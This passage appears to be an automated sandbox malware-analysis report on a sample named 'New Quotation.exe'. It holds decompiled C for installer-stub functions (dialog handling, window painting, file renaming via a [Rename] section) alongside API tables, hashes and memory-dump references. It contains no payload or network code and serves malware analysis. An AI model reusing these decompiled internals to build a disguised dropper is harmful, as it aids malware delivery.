				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x6211cc
						_t29 = _t69 + 0x14; // 0x6211e0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x6252da
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}




















                                                                                                                                                                                          0x0040466a
                                                                                                                                                                                          0x00404797
                                                                                                                                                                                          0x004047f4
                                                                                                                                                                                          0x004047f8
                                                                                                                                                                                          0x004048c5
                                                                                                                                                                                          0x004048c7
                                                                                                                                                                                          0x004048c7
                                                                                                                                                                                          0x004048cd
                                                                                                                                                                                          0x004048cd
                                                                                                                                                                                          0x004048d0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004048d7
                                                                                                                                                                                          0x00404806
                                                                                                                                                                                          0x0040480c
                                                                                                                                                                                          0x00404816
                                                                                                                                                                                          0x00404821
                                                                                                                                                                                          0x00404824
                                                                                                                                                                                          0x00404827
                                                                                                                                                                                          0x00404832
                                                                                                                                                                                          0x00404835
                                                                                                                                                                                          0x0040483c
                                                                                                                                                                                          0x00404849
                                                                                                                                                                                          0x0040485a
                                                                                                                                                                                          0x00404860
                                                                                                                                                                                          0x00404868
                                                                                                                                                                                          0x00404876
                                                                                                                                                                                          0x0040487c
                                                                                                                                                                                          0x0040487c
                                                                                                                                                                                          0x0040483c
                                                                                                                                                                                          0x00404886
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404891
                                                                                                                                                                                          0x00404895
                                                                                                                                                                                          0x004048a5
                                                                                                                                                                                          0x004048a5
                                                                                                                                                                                          0x004048ab
                                                                                                                                                                                          0x004048b7
                                                                                                                                                                                          0x004048b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004048bb
                                                                                                                                                                                          0x00404886
                                                                                                                                                                                          0x004047a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004047b4
                                                                                                                                                                                          0x004047b4
                                                                                                                                                                                          0x004047b9
                                                                                                                                                                                          0x004047b9
                                                                                                                                                                                          0x004047bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004047e8
                                                                                                                                                                                          0x004047ea
                                                                                                                                                                                          0x004047ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004047ef
                                                                                                                                                                                          0x004047a2
                                                                                                                                                                                          0x00404670
                                                                                                                                                                                          0x00404673
                                                                                                                                                                                          0x00404678
                                                                                                                                                                                          0x0040467a
                                                                                                                                                                                          0x00404689
                                                                                                                                                                                          0x00404689
                                                                                                                                                                                          0x00404691
                                                                                                                                                                                          0x00404694
                                                                                                                                                                                          0x00404698
                                                                                                                                                                                          0x0040469b
                                                                                                                                                                                          0x0040469f
                                                                                                                                                                                          0x004046a2
                                                                                                                                                                                          0x004046a5
                                                                                                                                                                                          0x004046a8
                                                                                                                                                                                          0x004046af
                                                                                                                                                                                          0x004046b1
                                                                                                                                                                                          0x004046b1
                                                                                                                                                                                          0x004046bb
                                                                                                                                                                                          0x004046c8
                                                                                                                                                                                          0x004046d2
                                                                                                                                                                                          0x004046d7
                                                                                                                                                                                          0x004046da
                                                                                                                                                                                          0x004046df
                                                                                                                                                                                          0x004046f6
                                                                                                                                                                                          0x004046fd
                                                                                                                                                                                          0x00404710
                                                                                                                                                                                          0x00404713
                                                                                                                                                                                          0x00404727
                                                                                                                                                                                          0x0040472e
                                                                                                                                                                                          0x00404733
                                                                                                                                                                                          0x00404738
                                                                                                                                                                                          0x00404738
                                                                                                                                                                                          0x00404746
                                                                                                                                                                                          0x00404754
                                                                                                                                                                                          0x00404766
                                                                                                                                                                                          0x0040476b
                                                                                                                                                                                          0x0040477b
                                                                                                                                                                                          0x0040477d
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                          • String ID: Call$N
                                                                                                                                                                                          • API String ID: 3103080414-3438112850
                                                                                                                                                                                          • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                          • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                                                                                                                          0x0040100a
                                                                                                                                                                                          0x00401039
                                                                                                                                                                                          0x00401047
                                                                                                                                                                                          0x0040104d
                                                                                                                                                                                          0x00401051
                                                                                                                                                                                          0x0040105b
                                                                                                                                                                                          0x00401061
                                                                                                                                                                                          0x00401064
                                                                                                                                                                                          0x004010f3
                                                                                                                                                                                          0x00401089
                                                                                                                                                                                          0x0040108c
                                                                                                                                                                                          0x004010a6
                                                                                                                                                                                          0x004010bd
                                                                                                                                                                                          0x004010cc
                                                                                                                                                                                          0x004010cf
                                                                                                                                                                                          0x004010d5
                                                                                                                                                                                          0x004010d9
                                                                                                                                                                                          0x004010e4
                                                                                                                                                                                          0x004010ed
                                                                                                                                                                                          0x004010ef
                                                                                                                                                                                          0x004010ef
                                                                                                                                                                                          0x00401100
                                                                                                                                                                                          0x00401105
                                                                                                                                                                                          0x0040110d
                                                                                                                                                                                          0x00401110
                                                                                                                                                                                          0x00401112
                                                                                                                                                                                          0x00401118
                                                                                                                                                                                          0x0040111f
                                                                                                                                                                                          0x00401126
                                                                                                                                                                                          0x00401130
                                                                                                                                                                                          0x00401142
                                                                                                                                                                                          0x00401156
                                                                                                                                                                                          0x00401160
                                                                                                                                                                                          0x00401165
                                                                                                                                                                                          0x00401165
                                                                                                                                                                                          0x00401110
                                                                                                                                                                                          0x0040116e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401178
                                                                                                                                                                                          0x00401010
                                                                                                                                                                                          0x00401013
                                                                                                                                                                                          0x00401015
                                                                                                                                                                                          0x0040101f
                                                                                                                                                                                          0x0040101f
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                          • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                          • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                          • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                                                                          0x00406183
                                                                                                                                                                                          0x0040618c
                                                                                                                                                                                          0x00406193
                                                                                                                                                                                          0x0040619d
                                                                                                                                                                                          0x004061b1
                                                                                                                                                                                          0x004061d9
                                                                                                                                                                                          0x004061e4
                                                                                                                                                                                          0x004061e8
                                                                                                                                                                                          0x00406208
                                                                                                                                                                                          0x0040620f
                                                                                                                                                                                          0x00406219
                                                                                                                                                                                          0x00406226
                                                                                                                                                                                          0x0040622b
                                                                                                                                                                                          0x00406230
                                                                                                                                                                                          0x00406234
                                                                                                                                                                                          0x00406243
                                                                                                                                                                                          0x00406245
                                                                                                                                                                                          0x00406252
                                                                                                                                                                                          0x00406256
                                                                                                                                                                                          0x004062f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040626c
                                                                                                                                                                                          0x00406279
                                                                                                                                                                                          0x0040629d
                                                                                                                                                                                          0x004062a1
                                                                                                                                                                                          0x004062c0
                                                                                                                                                                                          0x004062c4
                                                                                                                                                                                          0x004062c4
                                                                                                                                                                                          0x004062c6
                                                                                                                                                                                          0x004062cf
                                                                                                                                                                                          0x004062da
                                                                                                                                                                                          0x004062e5
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x004062a3
                                                                                                                                                                                          0x004062a6
                                                                                                                                                                                          0x004062b1
                                                                                                                                                                                          0x004062ad
                                                                                                                                                                                          0x004062af
                                                                                                                                                                                          0x004062b0
                                                                                                                                                                                          0x004062b0
                                                                                                                                                                                          0x004062b8
                                                                                                                                                                                          0x004062ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004062ba
                                                                                                                                                                                          0x00406284
                                                                                                                                                                                          0x0040628a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040628a
                                                                                                                                                                                          0x00406256
                                                                                                                                                                                          0x00406234
                                                                                                                                                                                          0x004061b3
                                                                                                                                                                                          0x004061be
                                                                                                                                                                                          0x004061c7
                                                                                                                                                                                          0x004061cb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004061cb
                                                                                                                                                                                          0x004062fc

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                                                                                                                            • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                            • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                                            • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New Quotation.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                            • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                                          • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                          • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				intOrPtr _t93;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t93 =  *0x433edc; // 0x6252da
					_t44 =  *(_t93 - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
